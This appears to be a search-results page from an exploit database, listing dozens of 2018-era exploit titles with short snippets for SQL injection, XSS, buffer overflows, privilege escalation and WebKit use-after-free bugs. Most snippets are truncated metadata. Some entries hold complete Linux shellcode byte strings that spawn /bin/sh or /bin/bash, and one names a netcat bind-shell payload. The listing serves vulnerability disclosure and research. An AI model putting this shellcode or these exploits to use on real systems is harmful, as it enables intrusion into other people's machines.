39001 matches found
NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR) Exploit
Exploit for windows platform in category local exploits Title: NICO-FTP 3.0.1.19 - Buffer Overflow SEHASLR Platforms: Windows Author: Miguel Mendez Z Vendor: Nico-FTP Version: 3.0.1.19 Tested on: Windows XPsp3 es/ Windows 7x86 eng !/usr/bin/python import struct Bad Byte:...
Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (50 bytes)
/ Title: Linux\x86 NOT +SHIFT-N+ XOR-N + encoded /bin/sh Shellcode 50 byes Author: Pedro Cabral Purpose: spawn /bin/sh shell Tested On: Ubuntu 16.04.01 LTS Arch: x86 Size: 50 bytes sh.asm global start section .text start: xor eax, eax ; reseting the register push eax ; pushing null terminator pus...
LayerBB Forum 1.1.1 - search_query SQL Injection Vulnerability
Exploit for php platform in category web applications...
virtualenv 16.0.0 - Sandbox Escape Vulnerability
Exploit for windows platform in category local exploits Exploit Title: virtualenv 16.0.0 - Sandbox Escape Exploit Author: vrsystem Vendor Homepage: https://virtualenv.pypa.io/en/stable/ Software Link: https://virtualenv.pypa.io/en/stable/ Version: 16.0.0 Tested on: kali linux CVE : CVE-2018-17793...
Wikindx 5.3.2 Multiple Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Wikindx 5.3.2 Multiple Cross-Site Scripting Exploit Author: Seccops https://seccops.com Vendor Homepage: http://wikindx.sourceforge.net/ Software Link: https://sourceforge.net/projects/wikindx/files/latest/download Version: 5.3....
Joomla Jimtawl 2.2.7 Component - id SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Joomla! Component Jimtawl 2.2.7 - 'id' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: https://janguo.de/ Software Link:...
Airties AIR5342 1.0.0.18 - Cross-Site Scripting Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Airties AIR5342 1.0.0.18 - Cross-Site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.airties.com/ Software http://www.airties.com.tr/support/dcenter/ Version: 1.0.0.18 Affected products: AIR5342,...
FTP Voyager 16.2.0 - Denial of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title: FTP Voyager 16.2.0 - Denial of Service PoC Author: Abdullah Alıç Homepage: https://www.serv-u.com/ Software Link: https://www.serv-u.com/ftp-voyager Tested Version: 16.2.0 Tested on OS: Windows XP Professional sp3 ENG Steps to...
Zechat 1.5 - uname SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Zechat 1.5 - 'uname' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: https://bylancer.com/ Software Link: https://bylancer.com/products/zechat-php-script/index.php Version: 1.5 Category: Webapps Tested on:...
PTC ThingWorx Password Disclosure / Cross Site Scripting Vulnerabilities
PTC ThingWorx suffers from cross site scripting and password disclosure vulnerabilities. Versions affected include 6.5 through 7.4, 8.0.x, 8.1.x, and 8.2.x. ======================================================================= title: Password disclosure vulnerability & XSS product: PTC ThingWor...
RICOH MP C1803 JPN Printer - Cross-Site Scripting Vulnerability
Exploit for hardware platform in category web applications Exploit Title: RICOH MP C1803 JPN Printer - Cross-Site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.ricoh.com/ Hardware Link : https://www.ricoh.co.jp/mfp/mpc/1803/ Software : RICOH Printer Product Version: MP...
Linux/x64 - Execute /bin/nc -lvp 9090 Shellcode (60 bytes)
Linux/x64 - Execute /bin/nc -lvp 9090 Shellcode 60 bytes Usage: gcc sc.c -o sc -z execstack include include int mainvoid char sc =...
WUZHICMS 2.0 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Title: WUZHICMS 2.0 - Cross-Site Scripting Author: Felipe "Renzi" Gabriel Vendor: http://www.wuzhicms.com Software: WUZHICMS 2.0 CVE: CVE-2018-17832 Technical Details & Description: A Cross Site Scripting vulnerability has been discovered in t...
OPAC EasyWeb Five 5.7 - nome SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: OPAC EasyWeb Five 5.7 - 'nome' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://www.nexusfi.it/ Software Link: http://www.nexusfi.it/easyweb.php Version: 5.7 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CV...
Billion ADSL Router 400G 20151105641 - Cross-Site Scripting Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Billion ADSL Router 400G 20151105641 - Cross-Site Scripting Author: Cakes Vendor Homepage: http://www.billion.com Software Link: http://billionfirmware.co.za Tested Version: 20151105641 Tested on OS: Kali Linux CVE: N/A...
Linux Kernel 2.6.x / 3.10.x / 4.14.x (x64) - Mutagen Astronomy Local Privilege Escalation Exploit
Exploit for linux platform in category local exploits / EDB-Note: Systems with less than 32GB of RAM are unlikely to be affected by this issue, due to memory demands during exploitation. EDB Note: poc-exploit.c / / poc-exploit.c for CVE-2018-14634 Copyright C 2018 Qualys, Inc. This program is fre...
OPAC EasyWeb Five 5.7 - biblio SQL Injection Vulnerability
Exploit for php platform in category web applications...
Coaster CMS 5.5.0 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Coaster CMS 5.5.0 - Cross-Site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.web-feet.co.uk/ Software Link : https://github.com/Web-Feet/coastercms Software : Coaster CMS Product Version: v5.5.0...
Fork CMS 5.4.0 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Fork CMS 5.4.0 - Cross-Site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.fork-cms.com/ Software Link : https://github.com/forkcms/forkcms Software : Fork 5.4.0 Product Version: 5.4.0 Vulernability Type ...
Airties AIR5750 1.0.0.18 Cross Site Scripting Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Airties AIR5750 - Cross-Site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.airties.com/ Software http://www.airties.com.tr/support/dcenter/ Version: 1.0.0.18 Tested on: MacOS High Sierra / Debian /...
Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH) Exploit
Exploit for windows platform in category local exploits Exploit Title: Zahir Enterprise Plus 6 build 10b - Buffer Overflow SEH Exploit Author: modpr0be Vendor Homepage: http://www.zahiraccounting.com/ Software Link: http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip Version: 6 bui...
Linux/x64 - execve ("/bin/sh") Shellcode (24 bytes)
Linux/x64 - Execve //bin/sh Shellcode 24 bytes Usage: gcc sc.c -o sc -z execstack include include int mainvoid char shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"; printf"size: %d\n", strlenshellcode; void shellcode; return 0;...
H2 Database 1.4.196 - Remote Code Execution Exploit
Exploit for java platform in category web applications Exploit Title: H2 Database 1.4.196 - Remote Code Execution Exploit Author: h4ckNinja Vendor Homepage: https://www.h2database.com/ Software Link: http://www.h2database.com/h2-2018-03-18.zip Version: 1.4.196 and 1.4.197 Tested on: macOS/Linux...
Airties AIR5343v2 1.0.0.18 Cross Site Scripting Vulnerability
A cross site scripting vulnerability has been discovered in the AIR5343v2 modem of the AirTies manufacturer. AirTies Air 5343v2 devices have XSS via the top.html productboardtype parameter. Exploit Title: Airties AIR5343v2 - Cross-Site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage:...
Airties AIR5442 1.0.0.18 Cross Site Scripting Vulnerability
A cross site scripting vulnerability has been discovered in the AIR5443v2 modem of the AirTies manufacturer. AirTies Air 5443v2 devices have XSS via the top.html productboardtype parameter. Exploit Title: Airties AIR5442 - Cross-Site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage:...
Singleleg MLM Software 1.0 - msg_id SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Singleleg MLM Software 1.0 - 'msgid' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://mlmsoftwarez.in/ Software Link: http://mlmdemo.biz/singleleg/root.html Software Link: http://mlmdemo.biz/autopool/root.html...
Education Website 1.0 - subject SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Education Website 1.0 - 'subject' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://scriptzee.com/ Software Link: http://scriptzee.com/products/details/34 Version: 1.0 Category: Webapps Tested on:...
ManageEngine AssetExplorer 6.2.0 Cross Site Scripting Vulnerability
In Zoho ManageEngine AssetExplorer, a Stored XSS vulnerability was discovered in the 6.2.0 version via the /AssetDef.do ciName or assetName parameter. Exploit Title: ManageEngine AssetExplorer 6.2.0 - Stored XSS Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.manageengine.com/ Hardwa...
Airties AIR5650 1.0.0.18 Cross Site Scripting Vulnerability
A cross site scripting vulnerability has been discovered in the AIR5650 modem of the AirTies manufacturer. AirTies Air 5650 devices have XSS via the top.html productboardtype parameter. Exploit Title: Airties AIR5650 - Cross-Site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage:...
AppArmor Filesystem Blacklisting Bypass Vulnerability
Exploit for linux platform in category local exploits AppArmor: filesystem blacklisting can be bypassed by moving parents Some AppArmor policies attempt to blacklist access to specific directories while broadly granting write access to everything else. For example, the Firefox profile uses the...
Binary MLM Software 1.0 - pid SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Binary MLM Software 1.0 - 'pid' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://mlmsoftwarez.in/ Software Link: http://mlmdemo.biz/binary/root.html Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...
Snes9K 0.0.9z - Denial of Service (PoC) Exploit
Exploit for windows platform in category dos / poc Exploit Title: Snes9K 0.0.9z - Denial of Service PoC Exploit Author: crashmanucoot Vendor Homepage: https://sourceforge.net/projects/snes9k/ Software Link: https://sourceforge.net/projects/snes9k/files/latest/download Version: 0.0.9z Tested on:...
Airties AIR5453 1.0.0.18 Cross Site Scripting Vulnerability
A cross site scripting vulnerability has been discovered in the AIR5453 modem of the AirTies manufacturer. AirTies Air 5453 devices have XSS via the top.html productboardtype parameter. Exploit Title: Airties AIR5453 - Cross-site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage:...
Airties AIR5021 1.0.0.18 Cross Site Scripting Vulnerability
A cross site scripting vulnerability has been discovered in the AIR5342 modem of the AirTies manufacturer. AirTies Air 5750 devices have XSS via the top.html productboardtype parameter. Exploit Title: Airties AIR5021 - Cross-Site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage:...
Hotel Booking Engine 1.0 - h_room_type SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Hotel Booking Engine 1.0 - 'hroomtype' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://scriptzee.com/ Software Link: http://scriptzee.com/products/details/35 Version: 1.0 Category: Webapps Tested on:...
Flippa Marketplace Clone 1.0 - date_started SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Flippa Marketplace Clone 1.0 - 'datestarted' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://scriptzee.com/ Software Link: http://scriptzee.com/products/details/15 Version: 1.0 Category: Webapps Tested on:...
Linux/x64 - execve ("/bin/bash") Shellcode (27 bytes)
Author: Artr0n Linux/x64 - Execve/bin/bash Shellcode Shellcode Lenght: 27 include include int mainvoid char shellcode = "\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"; printf"size: %d\n", strlenshellcode; void shellcode; return 0;...
Airties AIR5443v2 1.0.0.18 Cross Site Scripting Vulnerability
A cross site scripting vulnerability has been discovered in the AIR5442 modem of the AirTies manufacturer. AirTies Air 5442 devices have XSS via the top.html productboardtype parameter. Exploit Title: Airties AIR5443v2 - Cross-Site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage:...
Seqrite End Point Security 7.4 Privilege Escalation Vulnerability
Seqrite End Point Security version 7.4 suffers from a weak file permission privilege escalation vulnerability. Exploit Title : Seqrite End Point Security v7.4 - Weak Folder Permissions Privilege Escalation Exploit Author : Hashim Jawad - @ihack4falafel Vendor Homepage : https://www.seqrite.com/...
Skype On Debian Microsoft Apt Repo Addition Vulnerability
Skype on Debian automatically installs apt configuration that adds Microsoft's apt repo to the system's package sources. That way, Microsoft or anybody holding their repo's private key can easily inject malicious packages via regular update and replace distro packages w/ their own manipulated one...
Intel Extreme Tuning Utility 6.4.1.23 Code Execution / Privilege Escalation Vulnerabilities
Intel Extreme Tuning Utility version 6.4.1.23 suffers from code execution, privilege escalation, and denial of service vulnerabilities. Intel Extreme Tuning Utility 6.4.1.23 Code Execution / Privilege Escalation Hi @ll, the executable installer of the Intel Extreme Tuning Utility, version 6.4.1.2...
Microsoft Edge - Sandbox Escape Exploit
Microsoft Edge - Sandbox Escape Exploit 1. Content process - Privileged content process firststage.js When spawning a new Edge content process, its privilege is determined by its URL. This URL check is performed by the LCIEUrlPolicy::GetPICForPrivilegedInternalPage method in eModel.dll. The metho...
WebKit - WebCore::RenderTreeBuilder::removeAnonymousWrappersForInlineChildrenIfNeeded
Exploit for multiple platform in category dos / poc ::selection, input:focus, .class0, ul::first-letter -webkit-column-count: 85; float: left; function jsfuzzer var fuzzervars = ; try / / var00034 = document.getSelection; catche try var00034.setPositionhtmlvar00003; var var00043 catche try /...
WebKit - WebCore::SVGAnimateElementBase::resetAnimatedType Use-After-Free Exploit
Exploit for multiple platform in category dos / poc function eventhandler2 try var var00138 = svgvar00013.parentNode; catche try htmlvar00006.setAttribute"onfocusin", "eventhandler2"; catche try svgvar00001.aftervar00138; catche function eventhandler5 try htmlvar00028.autofocus = true; catche try...
WebKit - WebCore::SVGTextLayoutAttributes::context Use-After-Free Exploit
Exploit for multiple platform in category dos / poc tref, feMerge, title inherit; float: right; none; 81em function jsfuzzer try var var00006 = htmlvar00002.getSVGDocument; catche try var var00162 = document.head; catche try htmlvar00015.setSelectionRange2,56; catche try...
WebKit - WebCore::Node::ensureRareData Use-After-Free Exploit
Exploit for multiple platform in category dos / poc .class1 -webkit-mask-box-image-source: urlfoo; function freememory var a; forvar i=0;i100;i++ a = new Uint8Array10241024; document.implementation.createHTMLDocument"doc"; function jsfuzzer try var00097 = document.createElement"source"; catche tr...
WebKit - WebCore::SVGTRefElement::updateReferencedText Use-After-Free Exploit
Exploit for multiple platform in category dos / poc function freememory forvar i=0;i !-- ================================================================= ASan log: ================================================================= ==69919==ERROR: AddressSanitizer: heap-use-after-free on address...
WebKit - WebCore::RenderMultiColumnSet::updateMinimumColumnHeight Use-After-Free Exploit
Exploit for multiple platform in category dos / poc htmlvar00002, htmlvar00006 column-span: all; :root 1px; position: fixed; -webkit-column-width: 1px; .class2 text-indent: -webkit-shape-margin: 0px; -webkit-writing-mode: vertical-rl; '.' defselement, .class8 display: grid; 1s; function jsfuzzer ...
WebKit - WebCore::InlineTextBox::paint Out-of-Bounds Read Exploit
Exploit for multiple platform in category dos / poc -webkit-logical-width: 1px; -webkit-perspective: 1px; function jsfuzzer var htmlvar00011 = document.getElementById"htmlvar00011"; var htmlvar00019 = document.getElementById"htmlvar00019"; var htmlvar00049 = document.getElementById"htmlvar00049";...
WebKit - WebCore::RenderLayer::updateDescendantDependentFlags Use-After-Free Exploit
Exploit for multiple platform in category dos / poc htmlvar00005, noframes, diplay: inline; padding-top: 0vw; -webkit-column-count: 41; transition-delay: body::first-letter box-flex-group: -webkit-background-size: contain; -webkit-opacity: 0.716727864979; htmlvar00001, .class1 1vmax; display:...